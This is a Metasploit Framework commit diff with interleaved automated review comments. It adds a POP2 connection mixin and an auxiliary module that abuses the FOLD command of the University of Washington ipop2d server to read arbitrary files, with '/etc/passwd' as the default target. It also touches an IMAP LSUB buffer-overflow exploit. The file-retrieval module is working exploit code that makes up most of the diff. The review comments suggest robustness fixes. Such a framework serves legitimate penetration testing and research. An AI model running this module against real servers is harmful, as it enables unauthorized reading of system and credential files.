Added pop2 mixin, aux module, typos.
git-svn-id: file:///home/svn/framework3/trunk@5550 4d416f70-5f16-0410-b530-b9f4589650da
parent
4459fdd71d
commit
301b1514f3
|
@ -236,6 +236,7 @@ class Exploit < Msf::Module
|
|||
require 'msf/core/exploit/ndmp'
|
||||
require 'msf/core/exploit/imap'
|
||||
require 'msf/core/exploit/smtp_deliver'
|
||||
require 'msf/core/exploit/pop2'
|
||||
|
||||
# Networks
|
||||
require 'msf/core/exploit/lorcon'
|
||||
|
|
|
@ -0,0 +1,134 @@
|
|||
module Msf
|
||||
|
||||
require 'msf/core/exploit/tcp'
|
||||
|
||||
###
|
||||
#
|
||||
# This module exposes methods that may be useful to exploits that deal with
|
||||
# servers that speak the POP2 protocol.
|
||||
#
|
||||
###
|
||||
module Exploit::Remote::Pop2
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
#
|
||||
# Creates an instance of an POP2 exploit module.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
# Register the options that all POP2 exploits may make use of.
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(109),
|
||||
OptString.new('POP2USER', [ false, 'The username to authenticate as']),
|
||||
OptString.new('POP2PASS', [ false, 'The password for the specified username'])
|
||||
], Msf::Exploit::Remote::Pop2)
|
||||
end
|
||||
|
||||
#
|
||||
# This method establishes a POP2 connection to host and port specified by
|
||||
# the RHOST and RPORT options, respectively. After connecting, the banner
|
||||
# message is read in and stored in the 'banner' attribute.
|
||||
#
|
||||
def connect(global = true)
|
||||
print_status("Connecting to POP2 server #{rhost}:#{rport}...")
|
||||
|
||||
fd = super
|
||||
|
||||
# Wait for a banner to arrive...
|
||||
self.banner = fd.get_once
|
||||
|
||||
print_status("Connected to target POP2 server.")
|
||||
print_status("Banner: #{self.banner.split("\n")[0].strip}")
|
||||
|
||||
# Return the file descriptor to the caller
|
||||
fd
|
||||
end
|
||||
|
||||
#
|
||||
# Connect and login to the remote POP2 server using the credentials
|
||||
# that have been supplied in the exploit options.
|
||||
#
|
||||
def connect_login(global = true)
|
||||
pop2sock = connect(global)
|
||||
|
||||
|
||||
if (not (user and pass))
|
||||
print_status("No username and password were supplied, unable to login")
|
||||
return false
|
||||
end
|
||||
|
||||
print_status("Authenticating as #{user} with password #{pass}...")
|
||||
res = raw_send_recv("HELO #{user} #{pass}\r\n")
|
||||
|
||||
if (res !~ /messages/)
|
||||
print_status("Authentication failed")
|
||||
return false
|
||||
end
|
||||
|
||||
print_status("Messages: #{res}")
|
||||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# This method transmits a POP2 command and waits for a response. If one is
|
||||
# received, it is returned to the caller.
|
||||
#
|
||||
def raw_send_recv(cmd, nsock = self.sock)
|
||||
nsock.put(cmd)
|
||||
res = nsock.get_once
|
||||
end
|
||||
|
||||
#
|
||||
# This method sends one command with zero or more parameters
|
||||
#
|
||||
def send_cmd(args, recv = true, nsock = self.sock)
|
||||
cmd = args.join(" ") + "\r\n"
|
||||
if (recv)
|
||||
return raw_send_recv(cmd, nsock)
|
||||
else
|
||||
return raw_send(cmd, nsock)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# This method transmits a FTP command and does not wait for a response
|
||||
#
|
||||
def raw_send(cmd, nsock = self.sock)
|
||||
nsock.put(cmd)
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Wrappers for getters
|
||||
#
|
||||
##
|
||||
|
||||
#
|
||||
# Returns the user string from the 'POP2USER' option.
|
||||
#
|
||||
def user
|
||||
datastore['POP2USER']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the user string from the 'POP2PASS' option.
|
||||
#
|
||||
def pass
|
||||
datastore['POP2PASS']
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# This attribute holds the banner that was read in after a successful call
|
||||
# to connect or connect_login.
|
||||
#
|
||||
attr_accessor :banner
|
||||
|
||||
end
|
||||
|
||||
end
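Review bot: `connect` calls `self.banner.split("\n")[0].strip` without checking what `fd.get_once` returned, so a server that sends no banner (or an empty one) makes the status line raise instead of reporting a connection problem; `print_status("Banner: #{self.banner.to_s.lines.first.to_s.strip}")` would tolerate both cases. In `connect_login` the socket is stored in `pop2sock` but never used, and `raw_send_recv` falls back to `self.sock`, so a call with `global = false` presumably sends the HELO on a different socket or none; passing it through, as in `raw_send_recv("HELO #{user} #{pass}\r\n", pop2sock)`, would fix that. The same method writes the password in clear text through `print_status`, which ends up in console logs and screen captures; printing only the username would be safer. The header comments on `raw_send` ("FTP command") and on `pass` ("Returns the user string") look copied from elsewhere and should say POP2 and password.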
|
|
@ -0,0 +1,67 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Auxiliary::Admin::Pop2::Uw_FileRetrieval < Msf::Auxiliary
|
||||
|
||||
include Exploit::Remote::Pop2
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the FOLD command of the
|
||||
University of Washington ipop2d service. By specifying an arbitrary
|
||||
folder name it is possible to retrieve any file which is world or group
|
||||
readable by the user ID of the POP account. This vulnerability can only
|
||||
be exploited with a valid username and password. The From address is
|
||||
the file owner.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '368' ],
|
||||
[ 'BID', '1484' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 14 2000'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILE', [ true, "The file to retrieve", '/etc/passwd' ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
connect_login
|
||||
file = datastore['FILE']
|
||||
res = send_cmd( ['FOLD', file] , true)
|
||||
|
||||
if (res =~ /#1 messages in/)
|
||||
send_cmd( ['READ 1'] , true)
|
||||
file_output = send_cmd( ['RETR'] , true)
|
||||
print_status("File output:\r\n\r\n#{file_output}\r\n")
|
||||
send_cmd( ['ACKS'] , true)
|
||||
elsif (res =~ /#0 messages in/)
|
||||
print_status("File #{file} not found or read-access is denied.")
|
||||
end
|
||||
|
||||
send_cmd( ['QUIT'] , true)
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
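Review bot: `run` discards the return value of `connect_login`, which the mixin returns as `false` when credentials are missing or the HELO reply is rejected, so the FOLD and QUIT commands are still sent on a session that never authenticated. A guard at the top, `unless connect_login` / `disconnect` / `return`, would stop there. The `if`/`elsif` on `res` has no `else`, so a reply matching neither pattern (or no reply at all) ends the run without any message; an `else` branch that prints the unexpected response would make such failures visible. `disconnect` is only reached on the normal path, so wrapping the body in `begin` … `ensure disconnect` … `end` would close the socket if a send raises.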
|
|
@ -14,7 +14,7 @@ require 'msf/core'
|
|||
|
||||
module Msf
|
||||
|
||||
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
|
||||
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Imap
|
||||
|
||||
|
@ -23,7 +23,7 @@ module Msf
|
|||
'Name' => 'UoW IMAP server LSUB Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the 'LSUB'
|
||||
command of the the University of Washington IMAP service.
|
||||
command of the University of Washington IMAP service.
|
||||
This vulnerability can only be exploited with a valid username
|
||||
and password.
|
||||
},
|
||||
|
@ -72,7 +72,7 @@ module Msf
|
|||
connect_login
|
||||
|
||||
print_status("Sending overflow string...")
|
||||
req = "a001 LSUB \"\" {1064}\r\n"
|
||||
req = "a002 LSUB \"\" {1064}\r\n"
|
||||
sock.put(req)
|
||||
sleep(2)
|
||||
|
||||
|
|